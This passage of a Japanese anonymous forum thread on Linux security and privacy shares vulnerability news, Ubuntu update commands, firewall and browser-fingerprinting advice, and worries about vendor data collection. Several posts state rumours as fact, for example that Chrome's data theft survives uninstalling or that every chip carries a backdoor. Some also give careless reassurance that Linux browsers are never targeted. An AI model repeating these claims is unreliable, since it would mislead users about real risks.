110 :login:Penguin :2019/06/18(火) 17:26:10.39 ID:6P/bvjY8.net Netflix報告: Linux Kernel又はFreeBSDのリモートから攻撃可能な脆弱性(TCP SACK PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599) 2019年6月18日 05:11 Kazuki Omo https://security.sios.com/vulnerability/misc-security-vulnerability-20190618.html こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。 06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。 今後も情報が出てくると思われますので、こちらで取り上げます。 逐次情報は更新していく予定です。
111 :login:Penguin :2019/06/22(土) 09:34:44.67 ID:BWxAJ8Sj.net >>110 に関連して、アップデートが大量に来ている。 また、 ◆snapアプリのアップデートはaptコマンドでは不可能である。 初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。(Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ) (1)ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。 $ sudo apt update (2)最新の情報が取得され、システムは最新ですとの表示が出たら(4)に飛ぶ。もし、アップデートの必要のあるパッケージがあることが示されたら、次のコマンドを打ち、パッケージをダウンロードしてインストールする。 $ sudo apt -y upgrade ちなみに「-y」オプションは付けても付けなくても良いが、付けなかった場合には、インストール直後に本当にインストールして良いを[Y/N]と表示して確認してくる。この場合はYesを意味するYを押すことでインストールが始まる。 「-y」オプションを付けるとこの手順が飛ばされてダウンロードが完了次第、すぐにインストールが開始される。 (3)次の2つのコマンドは、それぞれ上記のコマンド実行の結果として、不要となった古いパッケージ、不要となったキャッシュを削除する。掃除であるから実行はたまにで良いが、ストレージ容量が少ない環境の人は頻繁にやるべきだろう。 $ sudo apt autoremove $ sudo apt autoclean (4)次にsnapアプリの更新を行う。 $ sudo snap refresh snapアプリをインストールした覚えが無くとも、システムがsnapを使っているため必ず実行すること。例えばGNOMEシェルはsnapであり、Ubuntu18.04.x LTSはすでに更新の必要が出ているので、未実行であれば直ぐに実行し最新版にしよう。 GUIからはすべてのアップデートや掃除はできない。取り分けsnapは(4)の手動アップデートでなければ更新できない。 出来るだけ毎日、しっかりアップデートを行い、セキュアなLinuxライフを送ろう。
112 :login:Penguin :2019/07/03(水) 23:55:13.69 ID:OptOlEBI.net >>1 Linuxなんて使わない。 以上。
113 :login:Penguin :2019/09/29(日) 21:20:57.29 ID:Nip3Jzi1.net 彡⌒ミ (,,・_・).。oO( 毛深くなりたい・・・ ) ヾ(,_uuノ
114 :login:Penguin :2019/10/13(Sun) 01:09:29 ID:ueikBXbu.net Google、Androidアプリでアップデートを各ユーザーに強制する方法を発表 | TechCrunch Japan https://jp.techcrunch.com/2019/05/08/2019-05-07-android-developers-can-now-force-app-updates/
115 :login:Penguin :2019/10/25(金) 00:20:33.72 ID:j4GkuklA.net >>6 それ違う 負けないためには、だね コモドでいいよな?
116 :login:Penguin :2019/12/12(木) 00:50:01.16 ID:jaG34Ck9.net IntelのCPUに脆弱性 [402859164] https://leia.5ch.net/test/read.cgi/poverty/1576065630/ 供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan https://jp.techcrunch.com/2019/12/11/2019-12-10-plundervolt-attack-breaches-chip-security-with-a-shock-to-the-system/ Plundervolt https://plundervolt.com/ 17 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 2bc5-3D6L)[sage] 投稿日:2019/12/11(水) 21:19:15.97 ID:x8hKACYL0 電圧変えて何すんのよ システムダウン? 19 名前:番組の途中ですがアフィサイトへの転載は禁止です (ブーイモ MM39-B8XO)[sage] 投稿日:2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM >>19 プロセッサ内で隠蔽されている暗号鍵を取得する。Blurayの暗号鍵もインテルの脆弱性で割れた 26 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa13-MFI9)[sage] 投稿日:2019/12/11(水) 22:31:10.46 ID:g2xDg2x0a >>19 エラーが起きたと思って秘匿領域のデータをダンプするんだってさ
117 :login:Penguin :2019/12/12(木) 02:35:29.36 ID:QpDguOY0.net Linuxだから安全です。
118 :login:Penguin :2019/12/12(木) 19:43:32.89 ID:jaG34Ck9.net >>116 続き 44 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ 5720-kui+)[] 投稿日:2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2] >1>21>28 なにこれ? PC起動してないとCPUコントロール出来ないよね? もしかして、ハードディスク暗号化してるPCを起動して、 暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか? >プロセッサ内で隠蔽されている暗号鍵 >秘匿領域 ここに何が格納されてるのか分からん スーパーハッカー解説お願いします。 54 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ e228-kui+)[] 投稿日:2019/12/12(木) 03:25:28.44 ID:QS0Nrunu0 >>46 ハードディスク暗号化してるPCを起動して、暗号化解除して使用してる最中に、 この脆弱性を使うとCPUが隠してた暗号鍵を見ることができる 63 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa3a-0Ppm)[sage] 投稿日:2019/12/12(木) 05:18:32.13 ID:nA2cuX1+a >>53 電圧いじれる(管理者)権限があってもSGXでやり取りされてる内容が見られないってのがウリの機能なので UHD-BDの暗号化解除機構に使われてるんやで 55 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 5720-AQmm)[] 投稿日:2019/12/12(木) 03:55:03.70 ID:gd2ZuGmF0 [2/2] >>56 それは結構やばいなあ まあ、暗号化解除前では意味なさそうなのが救いだな てか、cpuってハードディスクの暗号化解除後もcpu内に暗号を常時置いとくもんなの?
119 :login:Penguin :2019/12/13(金) 19:09:08.80 ID:ESmGY9a7.net >>117 コアダンプしそう
120 :login:Penguin :2019/12/13(金) 19:14:21.26 ID:ESmGY9a7.net Ubuntuアップデートしたらマイクロコード降ってきたけどこれかね 流石にそこまで早くないか
121 :login:Penguin :2019/12/16(月) 00:27:12.94 ID:Oy6287lw.net MicrosoftがUbuntu用のDefender出すんだって?
122 :login:Penguin :2019/12/16(月) 05:28:15.87 ID:AxOoqKNy.net LinuxサーバーはAzureしか選択肢が無くなったかもかも。
123 :login:Penguin :2019/12/16(月) 06:38:47.87 ID:AxOoqKNy.net iOSもカバーしてるからAzureが本命かもしれないよ。 WSLがどうでも良いわけじゃないだろうけど。
124 :login:Penguin :2019/12/16(月) 20:16:03.60 ID:F52Y2AF9.net >>121 MSの個人情報搾取に耐えかねてubuntuに逃げてきたのに 追いかけてくるってか...
125 :login:Penguin :2019/12/17(火) 02:23:31.85 ID:eJqKdH1L.net >>124 MSってそんな個人情報抜いてるの? Skypeで抜いてるのにはびびったが。 あれはそこそこ信用してただけにびっくりした。 Skypeごときの情報抜かないだろうって思ってた。 MSってGoogle並みに個人情報抜いてるの? Googleは怖くて使えんわ あんなの住所氏名電話番号全部バレてるだろ
126 :login:Penguin :2019/12/17(火) 03:54:51.93 ID:+GuS9PLu.net くこの板の一部の信者はMSに親を殺された!とかわめいてるけど、実はgoogleの方がヤバいっていうね
127 :login:Penguin :2019/12/17(火) 07:05:33.11 ID:BN1fWjc1.net ユーザーはキンタマ握られてるから誰も言わないだけで一番ヤバいのはApple
128 :login:Penguin :2019/12/17(火) 10:14:03.65 ID:d36jgmOT.net 最近はWindowsのアカウント作る時にできるだけMSアカウントを 作らせるよう誘導してくるな Win8あたりからだった記憶があるけど、Win10が大型アップデート するたびにどんどん露骨になってる印象
129 :login:Penguin :2019/12/17(火) 10:37:04.71 ID:h64x6iyX.net たしかに。
130 :login:Penguin :2019/12/17(火) 21:04:10.21 ID:IhVBQ6dn.net OS以外のファイルはゴッソリ抜かれてるのに Windows10とかOffice365とか無思慮に まして仕事で使ってるヤツの気が知れんわ
131 :login:Penguin :2019/12/17(火) 21:15:21.09 ID:486GIvh4.net チョロメや考えなしに派生したクロを入れるのも 泥棒の手を引いて家ん中案内するようなもんだしね
132 :login:Penguin :2019/12/18(水) 13:16:10.19 ID:b8AkMopr.net どれ使うのがええのん? opensuseとfirefox?
133 :login:Penguin :2019/12/18(水) 20:51:19.26 ID:ng+ewP2B.net 俺はwinの時sandboxie上でcookieや履歴の設定をユルユルにしたfirefox使ってweb見終わったら丸消ししてたんだが ubuntuにしてからは気軽に使えるsandboxが見当たらないんで仮想マシンにZorin LiteとFirefoxだけ入れてzipして やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる 多少手間だが これならいくらcookieやcanvas喰おうが いつもキレーなブラウザでインターネッツできると思ったんだけどね 砂箱スレでdockerもススメられたけど dockerはなんか違うかな?と思ったわ
134 :login:Penguin :2019/12/18(水) 23:21:12.25 ID:Ghj3q23V.net 【緊急警告】Google Chrome、Windows PC上の事実上全てのファイルを恒常的にスキャン https://hayabusa9.5ch.net/test/read.cgi/news/1522897669/
135 :login:Penguin :2019/12/19(木) 13:08:27.51 ID:eQXTO88z.net >>132 firefoxに余計な機能をブロックするuser.jsを育てたものを使ってる デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる… GNUのicecat(firefox系)も良い感じ >>133 firejail --private=<専用の一時ホームディレクトリ> とか? canvasは個別に対応が必要だと思う
136 :login:Penguin :2019/12/19(木) 15:29:49.65 ID:hhS7ytBr.net >>135 user.jsは一時期手を出してみたけど「これワザとやってんじゃないの?」っていうくらい あの設定ワードって言うの? about:configで左側に表示されるワードが 余りに頻繁に変更されるんで 根負けしてバンザイしたわ >canvasは個別に対応が必要だと思う とりまCanvasBlock入れてるけどOPTIONは内容が意味フで何言ってるかわかんないから手がつけられないでいるわ やっぱ色々と設定いじった方がいいもんなの?
137 :login:Penguin :2019/12/20(金) 02:13:31.46 ID:3v00n4yQ.net operaやvivaldiはどんな評価やろ
138 :login:Penguin :2019/12/20(金) 08:11:46.30 ID:W5p7NQnV.net GoogleがChromeやFirefox以外のブラウザを弾くようになって無理
139 :login:Penguin :2019/12/20(金) 20:28:03.18 ID:BMpjrsOC.net つ参考 Browser Fingerprinting対策ツールの評価(pdf) https://ipsj.ixsq.nii.ac.jp/ej/?action=repository_uri&item_id=187815&file_id=1&file_no=1 Web Browser Fingerprint解説ページ https://www.saitolab.org/fp_site/
140 :login:Penguin :2019/12/21(土) 16:40:49.62 ID:P2W6B/wx.net まじで教えてチョメ クロ 危ないんですか? 火狐は大丈夫なら 前2者は早速削除したいと思います。
141 :login:Penguin :2019/12/21(土) 16:56:46.98 ID:P2W6B/wx.net Sicklylifeさんはファイアーウオールは有効にしなくてもよい とありますので、設定していませんが、入れれば幾らかでも 安全になるのでしょうか
142 :login:Penguin :2019/12/21(土) 20:37:04.76 ID:8u1F/kP3.net >>140 Linux用ブラウザーを狙う奴なんていないから心配すんな。 あ、ブラウザー拡張機能は別な。拡張機能はOS問わずヤバいものがあるかもしれん。 >>141 例えばUbuntu新規インストしてupdate、dist-upgrade、rebootした後、 すぐにgufw入れてファイアーウォール有効にしても意味ないでしょ。 よく分かんないなら、とりあえずファイアーウォールは有効にしとけば?
143 :login:Penguin :2019/12/21(土) 21:33:25.68 ID:2yt7G6Gl.net >>140 チョロメが個人情報泥棒ブラウザなのは周知の事実 何年か前からwin10にタメ張ってかなり大規模に盗みやってるらしいゾ Win版のチョロはアンインストールしても 泥棒機能はOSの深いトコで生き続けるらしいから もし無しにしたいのならOSの入れ直ししかねーんじゃね? そんでせっかく金使って開発した泥棒機能をLinux版には入れていないなんて甘い見通しは無いと思うが? ゴキグルから見たらwinユーザーもLinuxユーザーも同じ金だろうに クロムもソースからゴキグルと通信する部分を削除していないのはアウトだと思っていーんじゃね?
144 :login:Penguin :2019/12/22(日) 05:32:17.57 ID:F7RmFDTN.net >>141 セキュリティは上がる、とは言える 最初はgufw,慣れればiptablesがおすすめ(FWというかネットワークの詳細なコントロールが出来る) 例えばFW無しだと、WANインターフェイスか0.0.0.0でリッスン中のプロセスがあれば外から繋がる これが設定ミスや脆弱性から悪用に発展する可能性、どんなプログラムを走らせてるのかバレる、DOSの可能性 ルーターの内側に居ればベーシックなFWの内側に居るのに近いけど、アプリがUPnPで勝手にルーターでポートを開ける事も無理じゃない LAN内の相手からは普通に繋がるし、必ずしもルーターの内側にいるのか?リッスン中のアプリに設定ミスや脆弱性は無いのか? FWはそういう可能性をカット出来る(公開する意図のない宛先には) 不要なアタックサーフェイスは狭めるのがセキュリティの基本
145 :login:Penguin :2019/12/22(日) 10:24:37.91 ID:QiAxui6d.net 小手先だけで、基礎の教養なしにubuntu を使っている小生には ほとんど判りませんが、兎に角拡張機能は避ける、fireWallは有効にしてみました、 ご教示有難う存じました。
146 :login:Penguin :2019/12/23(月) 03:58:31.72 ID:fOOPeHWr.net >>136-137 Canvasってなんだっけ? CanvasってJavaScriptオフだと機能しないよね? 俺の勘違い?
147 :login:Penguin :2019/12/23(月) 04:06:22.21 ID:fOOPeHWr.net Ubuntu18.04使用でブラウザはFirefox、Torbrowserしか入れてないわ Chromeは論外で他に選択しないからこの2つ以外入れてない Torスレでもなんか話題になってたけど、 普通のブラウジングするのにTorbrowserのTor機能だけ切るのはどうなの? TorBrowserもFirefox基盤だけど、 >>135 の >デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる… にはなってないよね? なにせTorBrowserだし・・・
148 :login:Penguin :2019/12/23(月) 04:54:54.78 ID:fOOPeHWr.net >>133 >ubuntuにしてからは気軽に使えるsandboxが見当たらないんで >仮想マシンにZorin LiteとFirefoxだけ入れてzipして >やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる なんでこんなめんどくさいことしてるの? 普通にFirefoxの全履歴削除すれば全部消えるんじゃないの? UbuntuのJournalに履歴とか残るから?
149 :login:Penguin :2019/12/23(月) 10:49:30.08 ID:1IWvct7N.net iptablesはもう古いよ これからはnftablesだよ
150 :login:Penguin :2019/12/23(月) 12:05:01.09 ID:x1WXtyaO.net 履歴w
151 :login:Penguin :2019/12/23(月) 17:23:14.88 ID:Y4WL5T53.net Oracle Linux の SELinux を disabled にしたら SSH で接続できなくなるのはなぜですか?
152 :login:Penguin :2019/12/24(火) 11:41:20.66 ID:NeirOfqJ.net >>146 ここで言ってるのはfingerprinting技術 WEBにアクセスした時に、環境ごとにユニークな値を生成させて取得(同時にIPや他情報もなるべく取得) その後IPを変えようがcookieやら消そうが同じようなユニークな値を取って紐付ければ特定に繋がる ブラウザだとcanvas,audio,rectその他がフィンガープリントするのに使えるらしい こんな追跡の仕方、技術の悪用に近いと思うけど…、色んな建前を使って取得&追跡されるのが常だからな JSを切ればcanvasでは取れないような…?他もかなり良くなる >>147 利便性とのバランスもあるけど、プライバシー重視なら俺もTor切ったTorBrowserは手っ取り早いと思う プロ?集団がプライバシー重視でアンチフィンガープリンティングにも力を入れて設定&開発したんだ 公式でTor無しバージョンもリリースすれば良いのに もちろんGやテレメトリその他色々無効になってる(about:configで確認出来る)
153 :login:Penguin :2020/01/28(火) 22:15:11 ID:zrSY3ZQs.net 無料ウイルス対策ソフトのアバストAvast、おまえらのネット閲覧データを販売か? [594632409] https://leia.5ch.net/test/read.cgi/poverty/1580177900/ 無料ウイルス対策ソフトのアバスト、ユーザーのウェブ閲覧データを販売か Carrie Mihalcik (CNET News) 翻訳校正: 編集部2020年01月28日 11時07分 ウィルス対策ソフトウェアメーカーAvastが、Jumpshotという子会社を通して「機密性の高い」ウェブ閲覧データを販売していると報じられている。 https://japan.cnet.com/article/35148566/
154 :login:Penguin :2020/01/28(火) 22:26:23 ID:msT/XQYC.net Linuxに関係あるんか?
155 :login:Penguin :2020/01/28(火) 22:30:53 ID:meBmn7jU.net やはり、営利企業がリリースするウィルス対策ソフトには、 用心したほうがいいんでしょう。そもそもなにゆえ無料なのか… avast は Linux用もあるからね。
156 :login:Penguin :2020/01/28(火) 22:39:50 ID:msT/XQYC.net Linux版も無料なのか?
157 :login:Penguin :2020/01/28(火) 22:49:55 ID:meBmn7jU.net >>156 今は知らんけど、過去にはあった。
158 :login:Penguin :2020/01/28(火) 22:52:43 ID:meBmn7jU.net CNET News 翻訳記事の中には、 「ユーザーのプライバシーと、当社の主力セキュリティ製品で必要なデータ利用とのバランスをとる責任」があることを理解し、重くとらえていると述べている。 と、こんな記事があるのね。これはGoogleの利用許諾とよく似ているねえ。 やはり、ビッグデータを収集したいわけだ。そうじゃなきゃ、無料はおかしい。
159 :login:Penguin :2020/01/28(火) 22:58:30 ID:msT/XQYC.net >>157 今はないとしたらほぼ影響はないか
160 :login:Penguin :2020/01/28(火) 23:02:40 ID:meBmn7jU.net >>159 今ないのかどうかは知らないし、avast サイトをのぞきたくはないし。
161 :login:Penguin :2020/01/28(火) 23:07:56 ID:msT/XQYC.net >>160 検索するくらいは出来るでしょ なさそうだけど
162 :login:Penguin :2020/01/28(火) 23:09:01 ID:YOaQ6DqC.net 数年前に中華資本になったんだっけ?
163 :login:Penguin :2020/01/28(火) 23:10:35 ID:meBmn7jU.net avast とは関わりたくないから。
164 :login:Penguin :2020/01/28(火) 23:14:54 ID:msT/XQYC.net 別に責めてるわけじゃないからね ただ話膨らませるなら検索くらいしなよ
165 :login:Penguin :2020/01/29(水) 00:38:40 ID:FX+veRBJ.net avastって中華になってたのかよw ロシアと中華マジスゲエなあ Linux関係ないけど、androidの中華作成のVirtual exposedってのも ウイルスてんこ盛りらしいから気をつけてな
166 :login:Penguin :2020/01/29(水) 08:40:01 ID:QKw1rI8u.net まじかよ つい先日レノボの Rayzen ノート買っちまったよ
167 :login:Penguin :2020/01/29(水) 09:38:52.68 ID:d7wE0hb8.net >>166 レノボは中共製で知られているが、個人データを密かに送信してるんじゃないかと かなり前に騒がれたが、今ではその話題は見かけないようになった。
168 :login:Penguin :2020/01/29(水) 09:48:03.97 ID:d7wE0hb8.net >>164 じゃ、話しを膨らませてあげるよ。 皆さん、結構関心あったと思うけど。何人も、avast 使ってウイルス対策していたよ。 このソフトは、無料なのに使いやすかったからなあ。
169 :login:Penguin :2020/01/29(水) 09:51:50.83 ID:d7wE0hb8.net アンチウイルス avast! Linux Home Edition https://mao.5ch.net/test/read.cgi/linux/1186329249/ この過去スレ、おもしろいよ。好奇心があるなら是非。
170 :login:Penguin :2020/02/14(金) 02:20:37.02 ID:c0Qe/FjT.net avastはチェコだろ avastが情報売買してるんなら買収したAVGもしてるんだろうな
171 :login:Penguin :2020/02/14(金) 16:38:25.68 ID:gX1pOkts.net >>168 日本語が不自由なようだな 検索をしろって話 話を膨らませろってことじゃない
172 :login:Penguin :2020/03/05(木) 01:34:35 ID:G4vFpVY+.net 【セキュリティ】スマホ、PCのバージョン更新をサボっている人は要注意! 世界10億台以上のデバイスに深刻な脆弱性が見つかる https://asahi.5ch.net/test/read.cgi/newsplus/1583331541/ ●Kr00kの影響を受けるデバイスは10億台以上! 「Kr00k(CVE-2019-15126)」と名付けられたこの脆弱性は、 多くのクライアントデバイスが採用するBroadcomおよびCypressのWi-Fiチップに存在。 脆弱性を解消するためのパッチの適用が必要となるデバイスの総数は、実に10億を超えているとみられる。 https://headlines.yahoo.co.jp/article?a=20200304-00010000-finders-bus_all
173 :login:Penguin :2020/03/05(木) 09:18:22 ID:A5krwWfW.net BroadcomもCypressも使ってないから無問題
174 :login:Penguin :2020/03/06(金) 07:58:55 ID:sgw3Rl5z.net >>172 ドザざまあwww Linux使ってた俺ら大勝利!
175 :login:Penguin :2020/03/07(土) 01:08:45 ID:m3qf4p2x.net もう全チップにバックドア埋め込まれてるとみといていいよ 重大なAndroidセキュリティリスクが確認され、数百万台のデバイスを「ルート化」できる-可能な場合は今すぐ更新 https://www.forbes.com/sites/daveywinder/2020/03/04/critical-android-security-risk-confirmed-millions-of-devices-can-be-rooted---update-now-if-you-can/amp/ エドワード・スノーデン (Edward Snowden) 総合スレ https://mao.5ch.net/test/read.cgi/war/1376109425/
176 :login:Penguin :2020/03/11(水) 06:58:14.09 ID:NC36v9Y3.net そのあたり懸念してReplicantOSってアンドロイドRomは機種限定してるんだよね。 WifiもAsix製チップ指定でUSBアダプタ経由で使う徹底ぶり。
177 :login:Penguin :2020/03/12(木) 14:42:59 ID:yHbe8GdM.net これどうだろ? 【PC】マイクロソフト、Linux用のマルウェア対策ソフト「Microsoft Defender ATP for Linux」 https://egg.5ch.net/test/read.cgi/bizplus/1582619543/
178 :login:Penguin :2020/03/12(木) 15:30:58 ID:AmodBQx2.net ええな
179 :login:Penguin :2020/03/14(土) 23:23:23 ID:ndyfJBcC.net なんか仕込まれそうで怖ぇ
180 :login:Penguin :2020/03/15(日) 19:44:45 ID:j8vnzYAm.net いまや個人情報売買で経営が成り立ってるマイクソがタダでモノ使わせてくれるわけないだろ?
181 :login:Penguin :2020/03/16(月) 02:00:31.10 ID:6TJuwv7v.net オープンソースじゃねえのか
182 :login:Penguin :2020/03/16(月) 20:44:24 ID:rhUEVfJP.net どーせはデータ受信部分にでも泥棒機能がついてて データ更新するたびにファイル構成やら設定したファイルやら 金の匂いのしそうなモンをアレコレ持ち出されるんだろ?w これぞMSクオリティじゃないか
183 :login:Penguin :2020/03/20(金) 16:39:40 ID:oDz6Qr3S.net >>25 >きちんと設定されてなかったり(互換性のせいで出来ない)、 SElinux有効にするとunboundが動かなくなるので無効にしてる よりによってプライバシー対策で切れないソフト
184 :login:Penguin :2020/03/26(木) 07:43:16.57 ID:941RjX5YI Linuxイメージをトレント経由でダウンロードって危険? トレントのほうが爆速なんだが...。
185 :login:Penguin :2020/03/26(木) 07:47:26.12 ID:941RjX5YI いま思ったけど、なんで2chはhttpsじゃないんだ?
186 :login:Penguin :2020/03/26(木) 23:02:10.20 ID:jrrqybHOJ >>185 自分も気になったけど、パフォーマンスに影響あるからとかじゃない?
187 :login:Penguin :2020/04/04(土) 21:56:37.27 ID:0zR8/rfhV プログラミングにはやってはいけない勉強法がある!?爆速で成長する王道のプログラミング学習法を紹介!https://www.youtube.com/watch?v=ZJqVQJwvwNI 慶應主席レベルの秀才がプログラミングの独学に失敗した理由https://www.youtube.com/watch?v=F2m1bsqaAHg 知らずに転職したら失敗する!ブラックIT企業を見分ける11のポイントを徹底解説https://www.youtube.com/watch?v=a8qDFMsYAqM 営業マンが独学のみでプログラマーに転職して1年で月収80万超えた話https://www.youtube.com/watch?v=94YQSckQGCs 未経験から2年でフリーランスエンジニアに!安定的に稼げるようになるための5ステップhttps://www.youtube.com/watch?v=oGNpEmFOEcU フリーランスエンジニアになるなら大規模ベンチャー or 小規模ベンチャー どっち?https://www.youtube.com/watch?v=-39tg9icRlU 【初心者必見】Webライター・Webマーケターを目指すならまずこの5冊!プロ御用達の文章術本を徹底紹介https://www.youtube.com/watch?v=y_QBBLdG9QM 【本質】稼げるフリーランスライターになるための前提とは【記事数=ライターの価値じゃない】https://www.youtube.com/watch?v=xFDMgcpknDA 生産性10倍!知らないと損する3つの最強デザインツールhttps://www.youtube.com/watch?v=z6x1R1455Kc
188 :login:Penguin :2020/04/12(日) 20:17:25 ID:FkqTAYd2.net 【IT】AppleとGoogleが「新型コロナウイルス追跡システム」をiOSとAndroidに組み込む。 ttps://asahi.5ch.net/test/read.cgi/newsplus/1586681010/ AppleおよびGoogleが提唱する追跡システムは、BLEを用いて連絡先追跡ネットワークを構築し、互いに近接していたスマートフォンに関する大量のデータを保持します。 iOS・Android端末間の相互運用を可能にするAPIをリリースすると発表。 さらに、2020年5月以降にはAppleとGoogleがモバイルOSにも追跡ソリューションを組み込むことで、Bluetoothベースの追跡システムをより幅広い範囲で活用できるようにするとしています https://gigazine.net/news/20200411-google-apple-coronavirus-tracing-system/
189 :login:Penguin :2020/04/12(日) 21:29:22 ID:PVWMHMkl.net >>188 具体的に何を可能とするかという説明が一切ないね
190 :login:Penguin :2020/04/12(日) 21:43:53 ID:PVWMHMkl.net これはプライバーの問題と係わってくるから 今でも、位置情報が記録されてる
191 :login:Penguin :2020/04/12(日) 22:39:18.40 ID:mweIS90Z.net Googleが開発したのに「AppleとGoogleが」 ロゴすらApple左Google右という徹底ぶり。
192 :login:Penguin :2020/04/12(日) 23:20:15 ID:wPD0Lny+.net アルファベット順だろ
193 :login:Penguin :2020/04/13(月) 00:34:03.12 ID:i2WW3vba.net 都合の良い時だけそう言うAppleメソッド。 作ったのはGoogleなのに、発表はアルファベット順にしろと言う。 だったらAlphabet/Goole Appleの順でなくちゃおかしいだろう
194 :login:Penguin :2020/04/13(月) 04:30:40.00 ID:hG1t6L/h.net 小学生の屁理屈
195 :login:Penguin :2020/04/22(水) 17:14:26.52 ID:kCvg5qbo.net 【スマホ】KDDI スマホ位置情報 都道府県などに無償提供 新型コロナ https://asahi.5ch.net/test/read.cgi/newsplus/1587540713/ 新型コロナウイルスの感染拡大防止に役立ててもらおうと、 auのKDDIは、スマートフォンの位置情報などのデータをプライバシーを保護したうえで 全国の都道府県などに無償で提供することを決めました。 ヤフーもこうしたデータの提供を始めていて、 大手企業が持つデータの活用がどこまで進むか注目されます。 https://www3.nhk.or.jp/news/html/20200422/k10012400501000.html
196 :login:Penguin :2020/05/01(金) 20:04:06 ID:Or87f1Mo.net 【中国】Xiaomiのスマートフォン アリババに端末の行動記録を無断で送信か シークレットモードでもアウト Xiaomi「嘘だ!」 [ガーディス★] https://asahi.5ch.net/test/read.cgi/newsplus/1588330336/ Xiaomiのスマートフォン「Xiaomi Redmi Note 8」が、端末上で行われたユーザーのほとんどの行動を記録し、アリババのサーバーに送っていることを、セキュリティ研究者のGabriel Cirlig氏が発見しました。 https://uk.pcmag.com/smartphones/126774/report-xiaomi-phones-scooping-up-tons-of-web-browsing-data-even-in-incognito-mode https://news.livedoor.com/lite/article_detail/18202655/ ..
197 :login:Penguin :2020/05/08(金) 23:30:53 ID:PgEvz8/n.net カスペルスキーがAndroid標的のスパイウェア「PhantomLance」の調査結果を公開、東南アジアを中心に活動 攻撃活動はベトナムに拠点を置くとみられるAPT(Advanced Persistent Threat)攻撃グループ「OceanLotus」によるものとみられ、 2019年7月にロシアのセキュリティベンダーであるDoctor Webが発見した。 なお、APT攻撃グループとは、国家組織からの指示と支援を受け、高度で持続的な脅威を実行するグループを指す。 不正アプリの主な目的はインストールしたデバイスのさまざまな情報を収集することで、 位置情報や通話ログ、連絡先、SMSのほか、インストールしているアプリのリストやAndroidデバイスのモデル、 OSのバージョンといったデバイス情報を収集しているという。 https://k-tai.watch.impress.co.jp/docs/news/1251/305/amp.index.html 最初に引っ掛らなかったのはこういうカラクリが『アプリのアップデートを配信することによって、 悪意ある機能が追加された』:PhantomLanceのAndroid向けバックドア、Google Playで見つかる https://itnews.org/news_resources/164747
198 :login:Penguin :2020/05/14(木) 17:36:10 ID:GXzXpqxg.net 【乞食速報】サイバー防御の教材、無料配布へ [158879285] https://leia.5ch.net/test/read.cgi/poverty/1589443202/ 実践的サイバー防御演習「CYDER」の教材を期間限定で一般公開 2020年5月12日 国立研究開発法人情報通信研究機構 国立研究開発法人情報通信研究機構(NICT、理事長: 徳田 英幸)ナショナルサイバートレーニングセンターは、当センターが推進する実践的サイバー防御演習「CYDER*」の周知啓発の取組の一環として、 本日、期間限定で過去の演習教材の一部の一般公開を開始しました。 ダウンロード方法やCYDERの詳細、最新情報等は、公式Webサイトにてご確認ください。 * CYDER(サイダー): CYber Defense Exercise with Recurrence(サイバー防御反復演習) CYDERでは、セキュリティインシデントが発生した際の対応手順や事前の備え等について学ぶことができます。 1 背景・趣旨 新型コロナウイルス感染症緊急事態宣言の発出を受け、日本国内の多くの組織において、在宅勤務等、通常と異なる形態での勤務を余儀なくされていますが、このような状況においても、サイバー攻撃の 脅威は続いています。サイバー攻撃への対策としては、ITシステムを利用する方々の基礎知識の習得やトレーニングが重要ですが、現在の社会情勢においては、十分な学習機会の確保が困難な状況と なっています。 このような情勢下における緊急的な措置及びCYDERの周知啓発の取組の一環として、このたび、NICTは、サイバーセキュリティに関する技術や知識を必要とする方の学習の一助とすべく、CYDERの過去の 演習教材の一部を期間限定で一般公開することとしました。
199 :login:Penguin :2020/05/14(木) 17:36:51 ID:GXzXpqxg.net 2 CYDER教材の一般公開の概要 1) 提供内容: 過去の演習シナリオを課題単位で再構成した教材を提供 2) 提供方法: 以下のWebサイトで申請を受け付け、指定場所からダウンロードする形で提供 https://cyder.nict.go.jp/ 3) 提供期間: 2020年5月12日(火)から当面の間(当機構の判断による) 4) 対象: 組織内において情報システムの管理に携わる方、その人材育成に関わる方、その他サイバー防御演習に関心のある方など 5) 費用: 無料 3 注意事項 1) 緊急事態宣言を受けた暫定的な対応として、期間限定での提供となります。そのため、状況の変化等に伴い、予告なく変更・終了する場合があります。 2) 学習者が興味のある課題を選択して学習できるよう、演習シナリオを課題単位に分割して提供します。 3) 今回は教材のみの配布のため、CYDERの大規模演習環境は利用できません。 4) 本教材の著作権は、国立研究開発法人情報通信研究機構に帰属します。商業上の利得や金銭報酬を目的とした営利目的の利用、及び、本教材の複製や改変、第三者への再配布を禁止します。 4 利用例 1) 外出が難しい状況下の在宅勤務等における学習教材 2) 組織内での研修用教材 3) 研修・教育を今後担当する方自身のトレーニング用教材 https://www.nict.go.jp/press/2020/05/12-1.html
